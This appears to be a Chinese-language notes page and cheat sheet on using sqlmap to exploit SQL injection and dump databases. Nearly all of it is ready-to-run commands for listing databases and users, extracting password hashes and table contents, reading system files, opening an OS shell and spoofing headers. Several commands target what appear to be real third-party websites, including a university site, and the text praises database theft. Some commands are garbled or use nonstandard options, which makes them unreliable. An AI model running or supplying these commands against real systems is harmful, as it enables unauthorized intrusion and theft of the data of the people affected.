SQLmap注入笔记
sqlmap.py -u "url" --tables 列出数据库中的表
( --tables:列出表)
sqlmap.py -u "url" -T 表 --columns 列出表中字段
-D:指定数据库名称
-T:指定要列出字段的表
--columns:指定列出字段
sqlmap.py -u "url" -T userb -C "帐号,密码" --dump
-C :指定要暴的字段
--dump:将结果导出
真正正确的语句?
SQLMAP 注入拖库常用命令
SQLMAP 是一款开源的渗透测试程序,它可以自动探测和利用 SQL 注入漏洞来获得我们想要的数据。
我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。
#> ./sqlmap.py -u http://www.cqiyc.com/about.asp?ModuleId=534 -v 1 --dbs // 列举数据库
#> ./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --current-db // 当前数据库
#>./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --users // 列数据库用户
#> ./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --current-user // 当前用户
#> ./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --tables -D 20100705 // 列举数据库的表名
#> ./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --columns -T “表名” -D “数据库” // 获取表的列名
#>./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --dump -C “字段 , 字段” -T “表名” -D “数据库” // 获取表中的数据,包含列
已经开始拖库了,SQLMAP 是非常人性化的,它会将获取的数据存储 sqlmap/output/ 中、、、
1) 判断当前用户是否是 dba
python sqlmap.py -u "url" --is-dba -v 1
2)--users: 列出数据库管理系统用户
python sqlmap.py -u "url" --users -v 0
3)--passwords: 数据库用户密码 (hash)
python sqlmap.py -u "url" --passwords -v 0
python sqlmap.py -u "url" --passwords -U sa -v 0
4) 查看用户权限
python sqlmap.py -u "url" --privileges -v 0
python sqlmap.py -u "url" --privileges -U postgres -v 0
5)--dbs 可以利用的数据库
python sqlmap.py -u "url" --dbs -v 0
6)--tables 列数据库表
python sqlmap.py -u "url" --tables -D "jdf"
-D: 指定数据名称
7)--columns 列出表中的列名
python sqlmap.py -u "url" --columns -T "user" -D "jdf" -v 1
-T: 指定表名,-D: 指定库名
8)--dump 列表中指定列的内容
python sqlmap.py -u "url" --dump -C "name" -T "user" -D "jdf"
-C: 可以指定字段
指定列的范围为 2 到 4
python sqlmap.py -u "url" --dump -T "users" -D "xyyl" --start 2 --stop 4 -v 0
9)--dumap-all 列出所有数据库,所有表内容
python sqlmap.py -u "url" --dump-all -v 0
只列出用户自己新建的数据库和表的内容
python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0
10)--file 读取文件内容 [load_file() 函数]
python sqlmap.py -u "url" --file /etc/password
11) 执行 SQL
python sqlmap.py -u "sqlmap.py -u "url" --is-dba -v 1" --os-shell
12)-p 指定参数
python sqlmap.py -u "url" -v 1 -p "id"
-p 可以指定多参数 -p "cat,id"
13)POST 提交
python sqlmap.py -u "url" --method POST --data "id=1"
14)COOKIE 提交
python sqlmap.py -u "url" --cookie "id=1" -v 1
cookie 值可以由 TamperData 抓取
15)refer 欺骗
python sqlmap.py -u "url" --refer "url" -v 3
16) 使用自定义 user-agent 或者 user-agents.txt
python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt"
17) 使用多线程猜解
python sqlmap.py -u "url" -v 1 --current-user --threads 3
18) 指定数据库,绕过 SQLMAP 的自动检测
python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL"
19) 指定操作系统绕过 SQLMAP 自动检测
python sqlmap.py -u "url" -v 2 --os "Windows"
20)--prefix and --postfix 自定义 payload
python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test"
21)union 注入测试
python sqlmap.py -u "url" --union-test -v -1
22) 配合 order by
python sqlmap.py -u "url" --union-test --union-tech orderby -v 1
23)python sqlmap.py -u "url" -v 1 --union-use --banner
24)python sqlmap.py -u "url" -v 5 --union-use --current-user
25)python sqlmap.py -u "url" -v 1 --union-use --dbs